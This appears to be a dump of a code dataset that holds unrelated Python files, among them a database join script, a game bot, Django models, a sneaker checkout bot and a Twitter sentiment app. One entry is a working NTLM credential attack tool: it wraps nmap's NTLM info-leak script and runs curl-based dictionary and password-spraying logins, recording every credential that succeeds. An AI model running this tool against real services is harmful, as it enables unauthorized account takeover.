index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
992,100 | 1f80f42bd74137e9d599cd33b4955383a332d61f | """
Created on 2/6/2019
@author: Jingchao Yang
Table join for one-to-one match post time and coordinates with tid
"""
from psqlOperations import queryFromDB
import csv
dbConnect = "dbname='harveyTwitts' user='postgres' host='localhost' password='123456'"
tb_join1 = "original_credibility_power"
tb_join2 = "original_gazetteer_power"
def getTids(col):
withTids = queryFromDB.get_multiColData(dbConnect, tb_join1, col)
return withTids
def matchTime(col, tidList):
"""
:param colName:
:param tidList:
:return:
"""
sql = "select " + col + " from " + tb_join2 + " where tid in (" + tidList[-1] + ")"
timeList = queryFromDB.freeQuery(dbConnect, sql)
spaceTime = []
for t in range(len(timeList)):
if tidList[0] is not None and tidList[1] is not None and timeList[t][0] != '':
spaceTime.append(
(tidList[0], tidList[1], tidList[2] + ',' + tidList[3], timeList[t][0], str(timeList[t][1])))
return spaceTime
colList = ['lat', 'lng', 'road_events', 'place_events', 'tids']
tidLists = getTids(colList)
# resultList = []
# for i in range(len(tidLists)):
# result = matchTime('tcreate', tidLists[i])
# resultList += result
# # print(resultList)
path = 'D:\\harveyTwitter\\power_distribution_old_3.csv'
with open(path, "w", newline='', encoding="utf-8") as csv_file:
writer = csv.writer(csv_file)
id = 0
for i in range(len(tidLists)):
result = matchTime('tcreate, tid', tidLists[i])
for line in result:
print((id,) + line)
writer.writerow((id,) + line)
id += 1
csv_file.close()
|
992,101 | 7ae42fc565ce68cf27db143413a7878536d75903 | /Users/jieqianzhang/anaconda3/lib/python2.7/sre_parse.py |
992,102 | 47a0d37834e16553b6590e01b94e3580228bda8f | #!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as pyplot
import imag_manip_gen3 as g
import fitness_ext as f
IMG_SHAPE = (240, 300, 3)
indfactory = g.IndividualFactory(120)
def draw_in_grid(img, shape, row, col):
pyplot.subplot(shape[0], shape[1], shape[1]*row + col + 1)
pyplot.axis("off")
pyplot.imshow(img.copy().astype('uint8'))
def test_mutate():
mutators = [g.mutate_shape, g.mutate_color, g.mutate_reorder,
g.mutate_position, g.mutate_noise]
shape = (len(mutators) + 1, 4)
ind = indfactory.build()
decoded = np.empty(IMG_SHAPE, dtype = np.int)
f.decode_rectangles(ind.data, decoded)
orig_decoded = decoded.copy()
draw_in_grid(decoded, shape, 0, 0)
for row in xrange(1, shape[0]):
for col in xrange(shape[1]):
mutated = mutators[row - 1](ind)
# mutated = g.mutate(ind)
f.decode_rectangles(mutated.data, decoded)
draw_in_grid(decoded, shape, row, col)
def test_xover():
xovers = [g.crossover_unif, g.crossover_arith]
pa = indfactory.build()
ma = indfactory.build()
decoded = np.empty(IMG_SHAPE, dtype = np.int)
shape = (len(xovers) + 1, 10)
f.decode_rectangles(pa.data, decoded)
draw_in_grid(decoded, shape, 0, 0)
f.decode_rectangles(ma.data, decoded)
draw_in_grid(decoded, shape, 0, 1)
for row in xrange(1, shape[0]):
for col in xrange(shape[1]):
kid = xovers[row - 1](pa, ma)
f.decode_rectangles(kid.data, decoded)
draw_in_grid(decoded, shape, row, col)
# test_mutate()
test_xover()
pyplot.show()
|
992,103 | c3bd013e280943adfbd919904aa574139d38974d | #!/usr/bin/python3
# Simple wrapper for some command line NTLM attacks
import argparse
import sys
import os.path
import subprocess
from urllib.parse import urlparse
import re
import time
import signal
def test_login( username, password, url, http1_1 = False ):
global args, found, foundusers
username = username.strip()
password = password.strip()
# Skip this attempt if we already have credentials for this user
if username in foundusers:
return False
print("[*] Testing " + username + " : " + password)
# cmd = "curl -s -I --ntlm --user " + username + ":" + password + " -k " + url
try:
cmd = ["curl", "-s", "-I", "--ntlm", "--user", username + ":" + password, "-k"]
if http1_1:
cmd.append( '--http1.1' )
cmd.append(url)
out = subprocess.check_output( cmd ).decode('utf8')
m = re.findall( "HTTP\/\d.\d (\d{3})", out )
for code in m:
if code != "401":
print("[+] FOUND: " + username + " : " + password)
found.append( username + " : " + password )
foundusers.append( username )
if args.quitonsuccess:
sys.exit(0)
if args.delay:
time.sleep(args.delay)
return True
if args.delay:
time.sleep(args.delay)
except SystemExit:
raise
except:
print('ERROR: curl call failed')
return False
def show_found():
if len( found ) > 0: print("Found:\n - " + "\n - ".join(found))
else: print("No creds found :(")
def cancel_handler(signal=None,frame=None):
print("Caught ctrl-c, quitting...")
show_found()
sys.exit(0)
signal.signal(signal.SIGINT, cancel_handler)
parser = argparse.ArgumentParser(description="Wrapper for NTLM info leak and NTLM dictionary attack")
parser.add_argument("-c", "--credslist", help="File with list of credentials in <username>:<password> format to use")
parser.add_argument("-u", "--user", help="Username to dictionary attack as")
parser.add_argument("-U", "--userlist", help="Username list to dictionary attack as")
parser.add_argument("-p", "--password", help="Password to dictionary attack as")
parser.add_argument("-d", "--domain", help="NTLM domain name to attack")
parser.add_argument("-P", "--passlist", help="Password list to dictionary attack as")
parser.add_argument("-D", "--delay", help="Delay between each attempt, in seconds")
parser.add_argument("-i", "--info", action="store_true", help="Exploit NTLM info leak")
parser.add_argument("-s", "--same", action="store_true", help="Try password=username")
parser.add_argument("-b", "--blank", action="store_true", help="Try blank password")
parser.add_argument("-1", "--quitonsuccess", action="store_true", help="Stop as soon as the first credential is found")
parser.add_argument("--http1_1", action="store_true", help="Force use of HTTP 1.1 (if you're getting \"curl call failed\" errors due to HTTP2)")
parser.add_argument("url", help="URL of NTLM protected resource, e.g. https://webmail.company.com/ews/exchange.asmx")
args = parser.parse_args()
if not args.url:
parser.print_usage()
sys.exit(2)
print()
if args.delay:
args.delay = int(args.delay)
url = urlparse(args.url)
if not url.port:
if url.scheme == 'https':
port = 443
else:
port = 80
else:
port = url.port
found = []
foundusers = []
print('Running against ' + url.geturl())
if args.info:
# Run NTLM info leak
cmd = "nmap -p" + str(port) + " --script http-ntlm-info --script-args http-ntlm-info.root="+url.path+" "+url.netloc
print(cmd)
os.system( cmd )
if (( args.user or args.userlist ) and ( args.password or args.passlist )) or args.credslist:
# Check user
if args.userlist and not os.path.isfile(args.userlist):
print('Couldn\'t find ' + args.userlist)
parser.print_usage()
sys.exit(2)
# Check password
if args.passlist and not os.path.isfile(args.passlist):
print('Couldn\'t find ' + args.passlist)
parser.print_usage()
sys.exit(2)
# Check user
if args.credslist and not os.path.isfile(args.credslist):
print('Couldn\'t find ' + args.credslist)
parser.print_usage()
sys.exit(2)
if args.passlist:
print("Password list")
fp = open( args.passlist, "r" )
if args.user:
if args.same:
test_login( args.user, args.user, url.geturl(), args.http1_1 )
if args.blank:
test_login( args.user, '', url.geturl(), args.http1_1 )
elif args.userlist:
fu = open( args.userlist, "r" )
for u in fu:
# Loop over blank / same for when multiple passes and users
if args.same:
test_login( u, u, url.geturl(), args.http1_1 )
if args.blank:
test_login( u, '', url.geturl(), args.http1_1 )
fu.close()
for p in fp:
if args.userlist:
fu = open( args.userlist, "r" )
for u in fu:
# many users, many passwords
test_login( u, p, url.geturl(), args.http1_1 )
fu.close()
else:
# One user, many passwords
test_login( args.user, p, url.geturl(), args.http1_1 )
fp.close()
elif args.userlist:
print("User list")
fu = open( args.userlist, "r" )
for u in fu:
# Many users, one password
test_login( u, args.password, url.geturl(), args.http1_1 )
if args.same:
test_login( u, u, url.geturl(), args.http1_1 )
if args.blank:
test_login( u, '', url.geturl(), args.http1_1 )
fu.close()
elif args.credslist:
print('Creds list')
fp = open( args.credslist, "r" )
for line in fp:
line = line.strip()
if line == '':
continue
creds = line.split(':')
if len( creds ) < 2:
print('No username / pass combination in: ' + line)
continue
test_login(creds[0], ':'.join(creds[1:]), url.geturl(), args.http1_1)
else:
# One user, one password
print("Single user / password")
if args.blank:
test_login( args.user, '', url.geturl(), args.http1_1 )
if args.same:
test_login( args.user, args.user, url.geturl(), args.http1_1 )
test_login( args.user, args.password, url.geturl(), args.http1_1 )
show_found()
print("Done")
|
992,104 | e59daaf3a88854a7d38453d7db64453214b93e99 | import pytesseract
import numpy as np
from . import ImageAnalyser as ia
import logging, importlib
from .settings.Point import Point
from .settings.Rectangle import Rectangle
logger = logging.getLogger("ZombidleBotLogger")
timesReadArea = 0
def reloadModules():
importlib.reload(ia)
def checkShard(img, settings):
read = ia.readCharacters(img, settings.shardTileBox)
logger.debug("read shard tile : " + read)
if "SHARD" in read:
return None
else:
read = ia.readCharacters(img, settings.shardEnterBox)
logger.debug("read shard menu entry : " + read)
if "SHARDS" in read:
logger.debug("arcane img enter shard : " + str(img[settings.shardEnterRedPos.height, settings.shardEnterRedPos.width]))
if img[settings.shardEnterRedPos.height, settings.shardEnterRedPos.width] > 55:
logger.info("Arcane -- enter shard menu")
return settings.shardEnterRedPos
else:
return None
else:
return None
return None
def processArcane(img, settings):
pr = img[settings.repeatLastCraftPos.height, settings.repeatLastCraftPos.width]
pg = img[settings.fastGhostCraftPos.height, settings.fastGhostCraftPos.width]
pc = img[settings.collectAllPos.height, settings.collectAllPos.width]
pb = img[settings.nextBoostPos.height, settings.nextBoostPos.width]
logger.debug("arcane img repeat : " + str(pr))
logger.debug("arcane img ghost : " + str(pg))
logger.debug("arcane img collect : " + str(pc))
logger.debug("arcane img boost : " + str(pb))
read = ia.readCharacters(img, settings.shardNoteBox)
if "build one shard" in read:
logger.debug("read shard note : " + read)
read = ia.readCharacters(img, settings.shardCraftBox)
if "RAF" in read:
logger.debug("read shard box : " + read)
logger.info("Arcane -- craft splinter or shard")
return settings.shardCraftBox.getCenterPoint()
else:
if pr == 61:
r = checkShard(img, settings)
if r != None:
return r
else:
logger.info("Arcane -- repeat last craft")
return settings.repeatLastCraftPos
if pg == 61:
r = checkShard(img, settings)
if r != None:
return r
else:
logger.info("Arcane -- fast ghost craft")
return settings.fastGhostCraftPos
if pc == 61:
logger.info("Arcane -- collect all")
return settings.collectAllPos
if pb == 61:
logger.info("Arcane -- craft boost")
return settings.nextBoostPos
if pr == 31 and pg == 31 and pc == 31 and pb == 31:
logger.info("Arcane -- quit")
return settings.arcaneQuitPos
logger.info("Arcane -- wait")
return None
def findPos(read1, read2, read3, ids, settings):
if all(x in read1 for x in ids):
return settings.reward1Pos
if all(x in read2 for x in ids):
return settings.reward2Pos
if all(x in read3 for x in ids):
return settings.reward3Pos
return None
def processReward(img, settings):
read1 = ia.readCharacters(img, settings.reward1Box)
logger.debug("read reward1 : " + read1)
read2 = ia.readCharacters(img, settings.reward2Box)
logger.debug("read reward2 : " + read2)
read3 = ia.readCharacters(img, settings.reward3Box)
logger.debug("read reward3 : " + read3)
p = findPos(read1, read2, read3, ["Chalice"], settings)
if p != None:
logger.info("Chest Reward -- Death Chalice")
return p
p = findPos(read1, read2, read3, ["cro Sw"], settings)
if p != None:
logger.info("Chest Reward -- Necro Sword")
return p
p = findPos(read1, read2, read3, ["abl"], settings)
if p != None:
logger.info("Chest Reward -- Stone Tablet")
return p
p = findPos(read1, read2, read3, ["Ring"], settings)
if p != None:
logger.info("Chest Reward -- Magic Ring")
return p
p = findPos(read1, read2, read3, ["ower"], settings)
if p != None:
logger.info("Chest Reward -- Power Potion")
return p
p = findPos(read1, read2, read3, ["ow", "x"], settings)
if p != None:
logger.info("Chest Reward -- Power Axe")
return p
p = findPos(read1, read2, read3, ["Collar"], settings)
if p != None:
logger.info("Chest Reward -- King's Collar")
return p
p = findPos(read1, read2, read3, ["Bear"], settings)
if p != None:
logger.info("Chest Reward -- Squid's Teddy Bear")
return p
p = findPos(read1, read2, read3, ["BC's"], settings)
if p != None:
logger.info("Chest Reward -- Lich's ABC's")
return p
p = findPos(read1, read2, read3, ["lagu"], settings)
if p != None:
logger.info("Chest Reward -- Plague in a Bottle")
return p
p = findPos(read1, read2, read3, ["ancy"], settings)
if p != None:
logger.info("Chest Reward -- Bat's Fancy Pin")
return p
p = findPos(read1, read2, read3, ["hys"], settings)
if p != None:
logger.info("Chest Reward -- Specter's Amethyst")
return p
p = findPos(read1, read2, read3, ["Knight"], settings)
if p != None:
logger.info("Chest Reward -- Red Knight's Lipstick")
return p
p = findPos(read1, read2, read3, ["Gian"], settings)
if p != None:
logger.info("Chest Reward -- Giant Zombie's Mace")
return p
p = findPos(read1, read2, read3, ["Zombie"], settings)
if p != None:
logger.info("Chest Reward -- Zombie Horde's Eye")
return p
logger.info("Chest Reward -- Left Item")
return settings.reward1Pos
def usePortal(img, settings):
global timesReadArea
read = ia.readCharacters(img, settings.errorBox)
logger.debug("read ask box : " + read)
if "Warp" in read:
logger.info("Use Portal -- Accept warp")
return (1, settings.yesPos)
if "Reset your game" in read:
logger.info("Use Portal -- Accept reset")
return (1, settings.yesPos)
read = ia.readCharacters(img, settings.resetGameBox)
logger.debug("read reset game box : " + read)
if "medals, Items and Hell" in read:
logger.info("Use Portal -- Use Time Portal")
return (1, settings.useTimePortalPos)
if timesReadArea < 3:
return None
p = img[settings.rigthPanelBarPos.height, settings.rigthPanelBarPos.width]
logger.debug("img rigth Panel Bar : " + str(p))
if p == 187:
p2 = img[settings.quickPortalPos.height, settings.quickPortalPos.width]
logger.debug("img quick portal : " + str(p2))
if p2 == 79:
logger.info("Use Portal -- Quick Portal")
return (1, settings.quickPortalPos)
else:
logger.info("Use Portal -- Reset Read Area Timer")
timesReadArea = 0
return (0, )
if p == 17:
logger.info("Use Portal -- click Rigth Panel Rigth Arrow")
return (1, settings.rigthPanelRigthArrowPos)
return None
def findRigthPanelCursorPos(img, settings):
return ia.findCenterSameColorHor(img, settings.rigthPanelBarBox, 5, 211, 220)
def findMinionTilesPos(img, settings):
return ia.findCenterSameColorHor(img, settings.rigthPanelMinionBox, 5, 19, 25)
def levelUpMinions(img, settings):
pm = img[settings.minionTabPos.height, settings.minionTabPos.width]
logger.debug("img minion tab : " + str(pm))
if len(findRigthPanelCursorPos(img, settings)) != 2:
return None
if pm != 29:
return (1, settings.minionTabPos)
r = [2]
l = findMinionTilesPos(img, settings)
king = False
carl = False
read = ia.readCharacters(img, settings.multipleBuyBox)
logger.debug("read multiple buy box : " + read)
if "MAX" not in read:
r.append(settings.multipleBuyBox.getCenterPoint())
logger.debug("append multiple buy")
r[0] = 1
return r
for i in range(0, len(l), 2):
p = l[i]
if p.width >= settings.rigthPanelMinionBox.topleft.width - 2 and l[i+1] >= settings.minionTileWidth - settings.minionPortraitWidth:
box = Rectangle.fromValues(p.width + l[i+1] - settings.minionTileWidth + settings.minionPortraitWidth, settings.minionNameBot, p.width + l[i+1], settings.minionNameTop)
readname = ia.readCharacters(img, box)
logger.debug("read minion name box 1 : " + readname)
if "Tomb" in readname:
king = True
if "CARL" in readname:
carl = True
box = Rectangle.fromValues(p.width + 10, settings.levelUpBot, p.width + settings.levelUpWidth, settings.levelUpTop)
point = box.getCenterPoint()
pixel = img[settings.levelUpRedHeight, int(point.width)]
logger.debug("pos level up 1 : " + str(point.width) + " " + str(settings.levelUpRedHeight))
logger.debug("img level up 1 : " + str(pixel))
if pixel == 29:
continue
if pixel == 53 or pixel == 25:
r.append(point)
else:
r.append(Point(p.width + l[i+1] / 2, settings.buyHeight))
continue
if p.width + l[i+1] >= settings.rigthPanelMinionBox.botrigth.width - 2 and l[i+1] >= settings.levelUpWidth:
box = Rectangle.fromValues(p.width + 10, settings.levelUpBot, p.width + settings.levelUpWidth, settings.levelUpTop)
read = ia.readCharacters(img, box)
logger.debug("read level up box 3 : " + read)
continue
if "LEVEL" in read:
r.append(box.getCenterPoint())
else:
r.append(Point(p.width + l[i+1] / 2, settings.buyHeight))
r.append(settings.rigthPanelRigthArrowPos)
r[0] = 1
logger.debug("carl " + str(carl))
logger.debug("king " + str(king))
if carl != True or king != True:
r[0] = 1
if carl == True:
r.append(settings.rigthPanelLeftArrowPos)
logger.debug("append left")
if king == True:
r.append(settings.rigthPanelRigthArrowPos)
logger.debug("append right")
if carl != True and king != True:
r.append(settings.rigthPanelRigthArrowPos)
logger.debug("append right")
r[0] = 1
if len(r) > 1:
return r
else:
return None
def determineAction(img, settings, mode = 0):
logger.debug("mode : " + str(mode))
global timesReadArea
logger.info("Action -- Start")
if np.array_equal(img[settings.extendRPanelCrossBox.getSliceNP()], settings.extendRPanelCrossIMG):
logger.info("Action -- open right panel")
return (1, settings.extendRPanelCrossBox.getCenterPoint())
read = ia.readCharacters(img, settings.areaBox)
logger.debug("read area box : " + read)
if "Area" in read:
timesReadArea += 1
else:
timesReadArea = 0
logger.debug("timesReadArea : " + str(timesReadArea))
read = ia.readCharacters(img, settings.dealBox)
if read == "THE DEAL":
logger.info("Action -- deal")
read = ia.readCharacters(img, settings.dealContentBox)
logger.debug("read deal : " + read)
if len(read) < 40:
logger.info("Deal -- message too short")
return (0, )
if "ull" in read or "minutes" in read:
logger.info("Deal -- Skull x")
return (1, settings.dealNoPos)
if "chest" in read:
logger.info("Deal -- Chest")
return (1, settings.dealNoPos)
if "amage" in read or ("sec" in read and "nds" in read):
logger.info("Deal -- Damage x")
return (1, settings.dealNoPos)
if "craft" in read or "time" in read:
logger.info("Deal -- Skip Craft Time")
if "free" in read:
return (1, settings.dealAwsomePos)
else:
return (1, settings.dealYesPos)
if "x" in read:
logger.info("Deal -- Diamonds")
if "free" in read:
return (1, settings.dealAwsomePos)
else:
return (1, settings.dealYesPos)
logger.info("Deal -- ??")
return (1, settings.dealNoPos)
read = ia.readCharacters(img, settings.dealBox.offset(settings.dealTryAgainOffset))
if read == "THE DEAL":
logger.info("Action -- deal (after try again)")
read = ia.readCharacters(img, settings.dealContentBox.offset(settings.dealTryAgainOffset))
logger.debug("read deal : " + read)
return (1, settings.dealYesPos.add(settings.dealTryAgainOffset))
read = ia.readCharacters(img, settings.dealThanksBox)
if read == "Thanks!":
logger.info("Action -- thanks")
return (1, settings.dealExitPubPos)
res = ia.findTemplateInImage(img, settings.ArcaneIMG)
if settings.arcaneIMGBox.contains(res):
logger.info("Action -- in arcane")
arcanePos = processArcane(img, settings)
if arcanePos == None:
return (0, )
else:
return (1, arcanePos)
read = ia.readCharacters(img, settings.arcaneTimerBox)
if "READY" in read:
logger.debug("read timer : " + read)
res = ia.findTemplateInImage(img, settings.GoToArcaneButtonIMG)
if settings.goToArcaneBox.contains(res):
logger.info("Action -- click arcane button")
return (1, settings.goToArcanePos)
else:
logger.info("Action -- click item tab")
return (1, settings.itemTabPos)
res = ia.findTemplateInImage(img, settings.ScrollIMG)
if settings.notifBox.contains(res):
logger.info("Action -- click Scroll")
return (1, res.getCenterPoint())
res = ia.findTemplateInImage(img, settings.ChestCollectorIMG)
if settings.notifBox.contains(res):
logger.info("Action -- click ChestCollector")
return (1, res.getCenterPoint())
read = ia.readCharacters(img, settings.rewardBox)
logger.debug("read reward box : " + read)
if "REWARD" in read or "Things" in read:
logger.info("Action -- Choose Chest Reward")
rewardPos = processReward(img, settings)
return (1, rewardPos)
if mode == 2 or mode == 3:
r = usePortal(img, settings)
if r != None:
return r
read = ia.readCharacters(img, settings.gotDeathCoinBox)
if "You got this!" in read:
logger.info("Action -- Get Death Coins")
return (1, settings.okPos)
read = ia.readCharacters(img, settings.dealNothingHappensBox)
if "smash that button" in read:
logger.info("Action -- Nothing Happens")
return (1, settings.dealNothingHappensPos)
read = ia.readCharacters(img, settings.errorBox)
if "Error" in read:
logger.info("Action -- Error")
return (1, settings.okPos)
if mode == 1 or mode == 3:
logger.debug("level up minions")
r = levelUpMinions(img, settings)
if r != None:
return r
read = ia.readCharacters(img, settings.HPBox)
logger.debug("read HP box : " + read)
if "HP" in read:
logger.info("Action -- Can click")
return (4, )
logger.info("Action -- nothing")
return (0, )
|
992,105 | 068245f83279975e17d709f532374d4a91cf065a | from django.db import models
from django.conf import settings
# Create your models here.
from django.db.models.signals import post_save
from tweets.models import Tweet
class UserProfileManager(models.Manager):
use_for_related_fields=True
def all(self):
qs = self.get_queryset().all()
#excludin following by same user to self
try:
if self.instance:
qs= qs.exclude(user=self.instance)
except:
pass
# print(self)
# print(dir(self))
# print(self.instance)
return qs
#manage follow/ unfollow users
def toggle_follow(self,user,to_toggle_user):
user_profile,created = UserProfile.objects.get_or_create(user=user)
if to_toggle_user in user_profile.following.all():
user_profile.following.remove(to_toggle_user)
isFollowed = False
else:
user_profile.following.add(to_toggle_user)
isFollowed=True
return isFollowed
def is_following(self,user,followed_by_user):
user_profile, created = UserProfile.objects.get_or_create(user=user)
if created:
return False
if followed_by_user in user_profile.following.all():
return True
return False
class UserProfile(models.Model):
#model.OneToOneField(modelName,)
#related_name is used in template
user = models.OneToOneField(settings.AUTH_USER_MODEL,related_name='profile',on_delete=models.CASCADE)
following = models.ManyToManyField(settings.AUTH_USER_MODEL,blank=True,related_name="followed_by")
objects = UserProfileManager()
def __str__(self):
#return str(self.following.all().count())
return str(self.user)
def get_following(self):
users =self.following.all() #Users.obhects.all()
return users.exclude(username=self.user.username)
def post_save_user_receiver(sender,instance,created,*args,**kwargs):
#print(instance)
if created:
new_profile = UserProfile.objects.get_or_create(user=instance)
#celery + redis
#do some email task after user sign up
#post_save.connect(post_save_user_receiver,sender=Model)
#when new user is connected it will also be added in UserProfile
post_save.connect(post_save_user_receiver,sender=settings.AUTH_USER_MODEL)
|
992,106 | f4e6a9f1e7cb328613ddaaac0674bbe11f4cdc46 | import numpy
from math import log2, sqrt
from scipy.linalg import solve
from decimal import Decimal
def pi(k):
a = Decimal(2) ** Decimal(0.5)
for i in range(0, int(log2(k / 4))):
a = ((a / 2) ** 2 + (1 - (1 - (a / 2) ** 2).sqrt()) ** 2).sqrt()
return float(k * a / 2)
def pi1(k):
b = 1
for i in range(0, int(log2(k / 4))):
b = numpy.sqrt(1 - 2 / (numpy.sqrt(b ** 2 + 1) + 1))
return k * b
def test():
ret = []
for n in range(2, 10):
k = 2 ** n
A = numpy.array([[1, 1 / k, 1 / k**2, 1 / k**3],
[1, 1 / (2*k), 1 / (2*k)**2, 1 / (2*k)**3],
[1, 1 / (4 * k), 1 / (4*k)**2, 1 / (4*k)**3],
[1, 1 / (8*k), 1 / (8*k)**2, 1 / (8*k)**3]])
B = numpy.array([pi(k), pi(2*k), pi(4*k), pi(8*k)])
ret.append(solve(A, B))
return ret
|
992,107 | d72a4ffee20cb96880166e88a5be550a37eebc2c | import time
import sys
import requests
from bs4 import BeautifulSoup
from splinter import Browser
mainUrl = "http://www.supremenewyork.com/shop/all"
baseUrl = "http://supremenewyork.com"
#productUrl = "http://www.supremenewyork.com/shop/t-shirts/morrissey-tee/white"
checkoutUrl = "https://www.supremenewyork.com/checkout"
# product info - input keyword as first argument
product = sys.argv[1]
selectOption = "Medium" # change this to the size you want
# billing/shipping info
namefield = "Name Name"
emailfield = "email@email.com"
phonefield = "0000000000"
addressfield = "00000 Zero Street"
zipfield = "00000"
statefield = "CA"
cctypefield = "master" # "master" "visa" "american_express"
ccnumfield = "000000000000" # this is random, not my info lol
ccmonthfield = "00"
ccyearfield = "0000"
cccvcfield = "000"
# checks main shop url for name of product
def main():
r = requests.get(mainUrl).text
if "This page cannot be found" in r:
print("Page could not be found")
return
print("Looking for: " + product)
if product in r:
print("The item is here!")
parse(r)
# Parses all the links
def parse(r):
soup = BeautifulSoup(r, "html.parser")
for a in soup.find_all('a', href=True):
link = a['href']
checkproduct(link)
# Check if product name is in url
def checkproduct(l):
if product in l:
if color in l:
prdurl = baseUrl + l
print(prdurl)
buyprd(prdurl)
# Open browser with the url and buy
def buyprd(prdurl):
browser = Browser('firefox')
browser.visit(prdurl)
time.sleep(.5)
print(browser.title)
browser.find_option_by_text(selectOption).first.click()
browser.find_by_name('commit').click()
if browser.is_text_present('item'):
print("Added to Cart")
else:
print("Error")
return
time.sleep(2)
print("checking out")
browser.visit(checkoutUrl)
time.sleep(.5)
print("Filling Out Billing Info")
browser.fill("order[billing_name]", namefield)
browser.fill("order[email]", emailfield)
browser.fill("order[tel]", phonefield)
print("Filling Out Address")
browser.fill("order[billing_address]", addressfield)
browser.fill("order[billing_zip]", zipfield)
browser.select("order[billing_state]", statefield)
print("Filling Out Credit Card Info")
browser.select("credit_card[type]", cctypefield)
browser.fill("credit_card[number]", ccnumfield)
browser.select("credit_card[month]", ccmonthfield)
browser.select("credit_card[year]", ccyearfield)
browser.fill("credit_card[verification_value]", cccvcfield)
browser.find_by_css('.terms').click()
time.sleep(.2)
print("Submitting Info")
browser.find_by_name('commit').click()
time.sleep(1)
browser.driver.save_screenshot('confirmation.png')
print("Exiting...")
time.sleep(2)
sys.exit(0)
i = 0
while (True):
test(mainUrl)
print("On try number " + str(i))
i = i + 1
time.sleep(8)
|
992,108 | c9547dc6342c0b0109f74e5d716a4965f206225b | # -*- coding: utf-8 -*-
print('some string')
print('I\'m lovin\' it')
print('C:\some\name')
print(r'C:\some\name')
print("I'm lovin' it")
print('some\n string')
print("some\n string")
|
992,109 | 62bde232ee96318ddbec85d863eb0661a8eed2d3 | from algorithms.primitive_algorithm_v3 import PrimitiveAlgorithm_v3
from algorithms.algorithm_v2 import Algorithm_v2
from metrics.parser_result_levenstein_metric import ParserResultLevensteinMetric
from parsers.ideal_parser import IdealParser
def get_max_distance(algorithm, golden_set):
path = "../golden/" + golden_set + "/"
N = 50
part = 0.5
ideal_parser = IdealParser(path)
learn_nums = range(int(N * part))
test_nums = range(int(N * part), N)
markup_list = list()
for i in learn_nums:
markup_list.append(ideal_parser.extract_markup(str(i) + "_markup.json"))
algorithm.directory = path
algorithm.learn(markup_list)
mx_dist = 0
mx_ind = 0
for i in test_nums:
with open(path + str(i) + ".html", "r") as file:
string = file.read()
parser_result = algorithm.parse(string)
ideal_result = ideal_parser.parse(string)
dist = metric.distance(parser_result, ideal_result)
if dist > mx_dist:
mx_dist, mx_ind = dist, i
return mx_dist, mx_ind
metric = ParserResultLevensteinMetric()
algorithm = Algorithm_v2("")
dist, page = get_max_distance(algorithm, "yandex")
print("Max dist = ", dist, ", page = ", page, sep="") |
992,110 | 35bf8969f763b6acab55d15b008effe989762d48 | from django.db import models
class companies(models.Model):
#Serial ID automatically created by django
company_name = models.CharField(max_length=500, blank = False, unique = True, primary_key = True)
def __str__(self):
return self.company_name
class headlines(models.Model):
#question = models.ForeignKey(Question, on_delete=models.CASCADE)]
# company_id = models.OneToOneField(
# companies,
# primary_key=True,
# on_delete=models.CASCADE
# )
company_name = models.ForeignKey(companies, on_delete = models.CASCADE) #When company in companies table is deleted, we delete all the headlines corresponding to it
#company_name = models.CharField(max_length=5000, blank = False) #When company in companies table is deleted, we delete all the headlines corresponding to it
title = models.CharField(max_length=5000, blank = False)
date_posted = models.DateField(blank = False)
week = models.IntegerField(blank = False)
year = models.IntegerField(blank = False)
score = models.FloatField(blank = False)
def __str__(self):
return self.title
# Create your models here. |
992,111 | b5dd76d8590a9964804665d5ffce7d6101c4c474 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#from setuptools import setup, find_packages
with open("README.md") as f:
long_description = f.read()
with open('mahstery/__init__.py', 'r') as f:
for line in f:
if line.startswith('__author__'):
author = line.split('=')[-1]
if line.startswith('__version__'):
version = line.split('=')[-1]
setup(
name='mahstery',
version=version,
description='Get mass or accretion history for modified gravity simulations',
long_description=long_description,
author=author,
url='https://github.com/correac/mahstery',
license="BSD",
keywords=['mahstery', 'cosmology', 'NFW', 'concentration', 'accretion'],
classifiers=['Development Status :: 0',
'Intended Audience :: Developers',
'Natural Language :: English',
'Programming Language :: Python :: 3.0'],
install_requires=['numpy',
'scipy',
'h5py',
'matplotlib']
#entry_points={
#'console_scripts': [
# 'mahstery = mahstery.mahstery:run'
# ],
#},
#packages=find_packages()
)
|
992,112 | a45e87c478785a880227bc64c1f7d853112c196f | import streamlit as st
import pandas as pd
import numpy as np
import tweepy
from textblob import TextBlob
from wordcloud import WordCloud
import pandas as pd
import numpy as np
import re
import matplotlib.pyplot as plt
plt.style.use('fivethirtyeight')
def extractTweet(number, sname, api):
posts = api.user_timeline(screen_name = sname, count = number, lang= "en", tweet_mode="extended")
return posts
def createDataframe(posts):
df = pd.DataFrame([tweet.full_text for tweet in posts], columns=['Tweets'])
return df
def cleanTxt(text):
text = re.sub(r'@[A-Za-z0-9]+', '', text) # r tells expression is raw string
text = re.sub(r'#', '', text) #remove # symbol
text = re.sub(r'RT[\s]+','', text) #Removing retweet
text = re.sub(r'https?:\/\/\S+','', text) #remove the hyperlink
return text
def getSubjectivity(text):
return TextBlob(text).sentiment.subjectivity
def getPolarity(text):
return TextBlob(text).sentiment.polarity
def getAnalysis(score):
if score < 0:
return 'Negative'
elif score == 0:
return 'Neutral'
else:
return 'Positive'
st.title("Twitter Sentiment Analyis")
st.set_option('deprecation.showPyplotGlobalUse', False)
tweet_extract = st.sidebar.selectbox("Select Number of Tweets to be extracted",("100","200","300"))
tweet_name = st.sidebar.selectbox("Select Whoes Tweets to be extracted",("narendramodi","BillGates","stevejobsceo"))
consumerKey = 'YOUR_CONSUMER_KEY'
consumerSecret = 'YOUR_CONSUMER_SECRET'
accessToken = 'YOUR_ACCESS_TOKEN'
accessTokenSeceret = 'YOUR_ACCESS_TOKEN_SECRET'
authenticate = tweepy.OAuthHandler(consumerKey, consumerSecret)
authenticate.set_access_token(accessToken, accessTokenSeceret)
api = tweepy.API(authenticate, wait_on_rate_limit= True)
posts = extractTweet(tweet_extract,tweet_name,api)
df = createDataframe(posts)
df['Tweets'] = df['Tweets'].apply(cleanTxt) # ? check apply functions
#Create two columns
df['Subjectivity'] = df['Tweets'].apply(getSubjectivity)
df['Polarity'] = df['Tweets'].apply(getPolarity)
df['Analysis'] = df['Polarity'].apply(getAnalysis)
#Plot the Word Cloud
allWords = ' '.join([twts for twts in df['Tweets']])
wordCloud = WordCloud(width = 500, height=300, random_state = 21, max_font_size=119).generate(allWords)
plt.imshow(wordCloud, interpolation="bilinear")
plt.axis('off')
st.pyplot()
# Plot the polarity and subjectivity
plt.figure(figsize=(8,6))
